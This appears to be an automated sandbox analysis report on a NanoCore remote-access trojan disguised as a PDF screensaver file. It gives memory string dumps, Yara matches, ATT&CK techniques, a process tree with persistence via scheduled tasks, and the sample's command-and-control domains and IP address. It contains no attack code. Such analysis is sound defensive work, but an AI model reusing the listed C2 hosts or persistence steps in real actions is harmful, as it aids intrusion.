ValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
Source: Yara match; File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe; Code function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
MITRE ATT&CK matrix: techniques with at least one matching signature, by tactic

Initial Access: none
Execution: Scripting; Native API; Command and Scripting Interpreter; Scheduled Task/Job
Persistence: DLL Side-Loading; Scheduled Task/Job; Registry Run Keys / Startup Folder
Privilege Escalation: Exploitation for Privilege Escalation; DLL Side-Loading; Process Injection; Scheduled Task/Job; Registry Run Keys / Startup Folder
Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Scripting; Obfuscated Files or Information; Software Packing; DLL Side-Loading; Masquerading; Virtualization/Sandbox Evasion; Process Injection; Hidden Files and Directories
Credential Access: Input Capture
Discovery: System Time Discovery; Account Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; System Owner/User Discovery; Remote System Discovery
Lateral Movement: none
Collection: Archive Collected Data; Input Capture
Exfiltration: none
Command and Control: Encrypted Channel; Non-Standard Port; Data Encoding; Remote Access Software; Non-Application Layer Protocol; Application Layer Protocol
Network Effects: none
Remote Service Effects: none
Impact: System Shutdown/Reboot
Behavior Graph ID: 798041 | Sample: 004349256789197.pdf.scr.exe | Start date: 03/02/2023 | Architecture: WINDOWS | Score: 100
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Sigma detected: Scheduled temp file as task from temp location; 11 other signatures

Process tree (started processes, with dropped files, network contacts and per-process signatures):

004349256789197.pdf.scr.exe
    dropped: C:\Users\user\AppData\Local\...\ihgsvw.exe (PE32)
    signatures: Starts an encoded Visual Basic Script (VBE)
    +- wscript.exe
        +- ihgsvw.exe
            dropped: C:\Users\user\AppData\Local\...\RegSvcs.exe (PE32)
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found API chain indicative of sandbox detection; 3 other signatures
            +- RegSvcs.exe
                network: december2n.duckdns.org 212.193.30.230, 49714, 49717, 49719 (SPD-NETTR, Russian Federation); december2nd.ddns.net
                dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32); C:\Users\user\AppData\Roaming\...\run.dat (data); C:\Users\user\AppData\Local\...\tmpA401.tmp (XML)
                signatures: Protects its processes via BreakOnTermination flag; Uses schtasks.exe or at.exe to add and modify task schedules; Hides that the sample has been downloaded from the Internet (zone.identifier)
                +- schtasks.exe
                |   +- conhost.exe
                +- schtasks.exe
                |   +- conhost.exe
                +- ihgsvw.exe
                    +- RegSvcs.exe

Other top-level process starts:
ihgsvw.exe
    signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys
    +- RegSvcs.exe
wscript.exe
    +- ihgsvw.exe
        +- RegSvcs.exe
6 other processes:
    ihgsvw.exe
        +- RegSvcs.exe
    ihgsvw.exe
        +- RegSvcs.exe
    conhost.exe
    3 other processes

Antivirus detection

Initial sample:
    004349256789197.pdf.scr.exe: ReversingLabs 45% (Win32.Trojan.Lisk); Virustotal 39%

Dropped files:
    C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe: Avira 100% (DR/AutoIt.Gen); ReversingLabs 26% (Win32.Dropper.Generic)
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe: ReversingLabs 0%

Unpacked PE files:
    22.2.RegSvcs.exe.720000.0.unpack: Avira 100% (TR/Dropper.MSIL.Gen7)
    10.2.RegSvcs.exe.6210000.7.unpack: Avira 100% (TR/NanoCore.fadte)

Domains: no antivirus matches

URLs:
